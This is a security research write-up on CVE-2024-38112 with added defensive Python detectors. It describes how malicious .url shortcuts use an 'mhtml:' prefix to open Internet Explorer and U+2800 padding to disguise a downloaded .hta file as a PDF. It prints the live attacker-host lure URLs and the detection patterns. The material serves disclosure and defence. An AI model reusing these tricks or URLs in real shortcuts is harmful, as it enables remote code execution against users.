Internet Explorer Resurrection: Malicious Actors Use Zero-Day Tricks in Internet Shortcut File to Lure Victims (CVE-2024-38112) – Check Point Research


by Haifei Li

Introduction and background

Check Point Research recently discovered that attackers were using new (or previously unknown) tricks to lure Windows users into executing remote code. Specifically, the attackers used special Windows Internet Shortcut files (.url extension) that, when clicked, call Internet Explorer (IE) to visit an attacker-controlled URL. A second trick, in IE itself, hides the malicious .hta extension. By opening the URL in IE instead of the modern and much more secure Chrome/Edge browsers on Windows, the attacker gained significant advantages in exploiting the victim’s computer, even though the computer runs the modern Windows 10/11 operating system.

As a reminder, it is not uncommon for malicious actors to use .url files as the initial attack vector in their campaigns. The use of new or zero-day vulnerabilities related to .url files has happened before. CVE-2023-36025, which was just patched last November, is a good example.

The malicious .url samples we discovered date from as early as January 2023 (over a year ago) to as late as May 13, 2024 (a few days before the time of writing). This suggests that malicious actors have been using these attack techniques for some time.

Resurrecting Internet Explorer with the “mhtml” trick

Let’s use the most recent .url sample on VirusTotal to explain the technique.

The content of the sample:

Figure 1: Content of the malicious .url sample

As we can see, the last few lines of the .url file point to a custom icon inside the Microsoft Edge application file msedge.exe. This makes the shortcut appear to point to a PDF file (which it is not).

It is important to note that the value of the URL key is quite different from the usual one. In a common .url file, the URL parameter looks like URL=https://www.google.com, which points to the URL https://www.google.com. But in this example the value is:

mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html

It uses the special prefix mhtml: and a !x-usc: separator in the middle.
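As an added example (not Check Point’s code and not from the malicious sample), the following script parses a .url file and flags the two indicators described above: a URL value that uses the mhtml: prefix or the !x-usc: separator, and an IconFile that borrows an icon from msedge.exe so the shortcut can pose as a document. The shortcut contents, hostname and icon path are constructed for the example.

```python
"""Added example (not Check Point's code): parse a Windows Internet Shortcut
(.url) file and flag the indicators discussed above. A .url file is an INI-style
text file whose [InternetShortcut] section holds the URL= and IconFile= keys."""
import configparser
import re

# Constructed sample modelled on the indicators described on the page; the
# hostname and icon path are assumptions, not values from the real sample.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=mhtml:http://example.invalid/te/test1.html!x-usc:http://example.invalid/te/test1.html
IconIndex=13
IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
"""

# Constructed benign shortcut for comparison.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.google.com
"""

MHTML_PREFIX = re.compile(r"^\s*mhtml:", re.IGNORECASE)
XUSC_SEPARATOR = re.compile(r"!x-usc:", re.IGNORECASE)
BROWSER_ICON = re.compile(r"(?:^|[\\/])msedge\.exe\s*$", re.IGNORECASE)


def parse_url_file(text: str) -> dict:
    """Return the key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    for section in parser.sections():
        if section.lower() == "internetshortcut":
            return dict(parser.items(section))
    return {}


def inner_targets(url_value: str) -> list:
    """Split an mhtml:...!x-usc:... value into the plain URLs it embeds."""
    body = MHTML_PREFIX.sub("", url_value)
    return [part for part in XUSC_SEPARATOR.split(body) if part]


def analyze_url_file(text: str) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    fields = parse_url_file(text)
    findings = []
    url_value = fields.get("url", "")
    if MHTML_PREFIX.search(url_value):
        findings.append("URL uses the mhtml: prefix, which routes the link to the MHTML handler (Internet Explorer)")
    if XUSC_SEPARATOR.search(url_value):
        findings.append("URL contains the !x-usc: separator seen in CVE-2021-40444 samples")
    if BROWSER_ICON.search(fields.get("iconfile", "")):
        findings.append("IconFile borrows an icon from msedge.exe, letting the shortcut masquerade as a document")
    return findings


if __name__ == "__main__":
    for finding in analyze_url_file(SAMPLE_URL_FILE):
        print("-", finding)
    print("embedded targets:", inner_targets(parse_url_file(SAMPLE_URL_FILE)["url"]))
```

The mhtml: check is the one that matters most for mail-gateway or endpoint triage: a legitimate shortcut has no reason to address the MHTML handler, so the prefix alone is a strong signal regardless of what the embedded URLs are.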

A few years ago, we saw the same trick (which we call the “mhtml” trick) used in the infamous CVE-2021-40444 zero-day attacks, where the file document.xml.rels contains the same kind of string.

Figure 2: Key content of the CVE-2021-40444 exploit sample

We know that the “mhtml” trick was already used in Word documents to exploit CVE-2021-40444, and now we see the same trick used in a .url file. So what could attackers accomplish with this? Let’s do some testing.

If we rename the sample to Books_A0UJKO.pdf.url (its name in the wild), the .url file looks like the following on a fully patched Windows 11: it appears as a link to a PDF file.

Figure 3: Malicious .url file appears as a link to a PDF file on Windows 11

Acting as the victim (who wants to open the PDF), we double-click the shortcut file. The victim then sees this:

Figure 4: IE and a prompt dialog appear when the victim double-clicks the .url file

See what’s weird? Internet Explorer is open. In fact, with some debugging, we were able to confirm that IE was indeed used to open the link http://cbmelipilla(.)cl/te/test1.html specified in the .url file.

As we know, Microsoft announced the end of IE a few years ago. On a typical Windows 10/11 system, a user’s normal actions should never open IE to visit websites, because it does not have the same level of security as modern browsers. IE is an outdated web browser that was well known for its lack of security. This is one of the main reasons Microsoft replaced it with the modern and more secure Microsoft Edge, and why many users simply install and use Google’s Chrome browser.

Note: Even though IE has been declared “retired and out of support,” technically speaking IE is still part of the Windows operating system and is “not inherently dangerous, as IE is still supported for security vulnerabilities, and there should be no known exploitable security vulnerabilities,” according to our communications with Microsoft.

So, by default, users should not open websites with IE unless they specifically and knowingly request it.

However, in this example, with the “mhtml” trick, when the victim opens the .url shortcut (the victim thinks they are opening a PDF), the attacker-controlled website opens with IE, rather than the regular Chrome/Edge.

From there (with the website open in IE), the attacker could do many bad things, because IE is insecure and outdated. For example, if the attacker has an IE zero-day exploit, which is much easier to find than one for Chrome/Edge, the attacker could exploit the victim and immediately gain RCE. However, in the samples we analyzed, the threat actors did not use any IE RCE exploit. Instead, they used another IE trick, to our knowledge not publicly known before, to trick the victim into granting them RCE.

Additional IE trick: hiding the .hta extension

Let’s revisit the previous figure (enlarged below). The IE prompt appears to ask the user to open a PDF file named Books_A0UJKO.pdf.

Figure 5: A closer look at the IE dialog box – showing only the PDF file name

But is that the case here? Do you think you’re opening a PDF?

Not really. If we click “Open” (the default option) in the IE dialog above, we get another prompt (see below). This comes from IE’s Protected Mode (a relatively weak browser sandbox).

Figure 6: IE Protected Mode Warning Dialog Box

If the victim continues to ignore the warning (because they think they are opening a PDF), their computer will eventually be hacked: the “opened” file is actually a malicious .hta file being downloaded and executed.

If we look closely at the HTTP traffic, we find that many non-printable characters are appended to the Books_A0UJKO.pdf string, and only after them comes the .hta string: the real (and dangerous) extension.

Figure 7: HTTP traffic showing the full URI visited

This is exactly why the IE dialog box didn’t show the .hta file name to the user. The actual full URL is:

https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta

With this trick, the attacker can successfully convince the victim to proceed, while in fact the victim downloads and runs a dangerous .hta application.
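As an added example (not Check Point’s code), the function below percent-decodes the file name at the end of a URL the way a browser would, then compares the extension a user sees at a glance with the extension that is really used, exposing padding characters such as U+2800 (the character behind %E2%A0%80). The sample URL, its hostname and the padding count of 26 are constructed for the example.

```python
"""Added example (not Check Point's code): decode the file name at the end of a
URL the way the browser would and compare the extension a user sees with the
one that is really used, so padding characters such as U+2800 are exposed."""
import unicodedata
from urllib.parse import unquote, urlsplit

# Constructed sample that mirrors the pattern described on the page: a .pdf name
# followed by 26 percent-encoded U+2800 (BRAILLE PATTERN BLANK) characters and
# the real .hta extension. The hostname is a placeholder.
SAMPLE_URL = "https://example.invalid/te/Books_A0UJKO.pdf" + "%E2%A0%80" * 26 + ".hta"


def is_plain(char: str) -> bool:
    """Only printable ASCII counts as plain; everything else is treated as suspicious
    padding. Note that str.isprintable() alone would miss U+2800, which Unicode
    classifies as a printable symbol even though it renders as a blank."""
    return " " <= char <= "~"


def analyze_filename(url: str) -> dict:
    """Report the apparent and real extensions of the file name in a URL path."""
    raw_name = urlsplit(url).path.rsplit("/", 1)[-1]
    name = unquote(raw_name)  # percent-decode to UTF-8 text
    # The leading run of plain characters is what a casual glance at the name conveys.
    shown = ""
    for char in name:
        if not is_plain(char):
            break
        shown += char
    padding = [char for char in name if not is_plain(char)]
    apparent_ext = shown.rsplit(".", 1)[-1].lower() if "." in shown else ""
    real_ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return {
        "shown": shown,
        "apparent_extension": apparent_ext,
        "real_extension": real_ext,
        "padding_count": len(padding),
        "padding_chars": sorted({f"U+{ord(c):04X} {unicodedata.name(c, 'UNNAMED')}" for c in padding}),
        "mismatch": apparent_ext != real_ext,
    }


if __name__ == "__main__":
    result = analyze_filename(SAMPLE_URL)
    for key, value in result.items():
        print(f"{key}: {value}")
```

The caveat worth remembering when writing such a check is that U+2800 passes Python’s isprintable() and similar "is this a control character" tests in other languages; an allowlist of plain ASCII, as used here, is the more reliable way to spot a file name that has been padded to push its real extension out of view.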

Sample hashes (SHA-256):
bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0
b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104
65142c8f490839a60f4907ab8f28dd9db4258e1cfab2d48e89437ef2188a6e94
bfd59ed369057c325e517b22be505f42d60916a47e8bdcbe690210a3087d466d
22e2d84c2a9525e8c6a825fb53f2f30621c5e6c68b1051432b1c5c625ae46f8c
c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae

Defense and Mitigation

We have confirmed that the mentioned exploit tricks, which have been actively used for at least a year, work on the latest Windows 10/11 operating systems.

Check Point released protections on IPS and Harmony Email (the IPS signature is named “Internet Shortcut File Remote Code Execution”) to customers months before this publication, protecting against this zero-day attack.

Harmony Email & Collaboration provides complete protection against this zero-day attack at the highest security level.

We reported our findings to the Microsoft Security Response Center (MSRC) on Thursday, May 16, 2024. Since then, both parties have worked closely on this issue, resulting in an official Microsoft patch (CVE-2024-38112) released on July 9. Windows users are strongly encouraged to apply the patch as soon as possible.

For concerned Windows users, we recommend being especially vigilant about .url files sent from untrusted sources. As we have seen, this type of attack requires some user interaction (clicking through the prompts) to succeed.

Check Point Research continues to monitor activity related to this type of attack around the world.

Conclusion

To summarize the attacks from an exploitation perspective: the first technique used in these campaigns is the “mhtml” trick, which lets the attacker invoke IE instead of the more secure Chrome/Edge browsers. The second technique is an IE trick that makes the victim believe they are opening a PDF file, when in fact they are downloading and executing a dangerous .hta file. The overall goal of these attacks is to make victims think they are opening a PDF file, and the two tricks together achieve this.
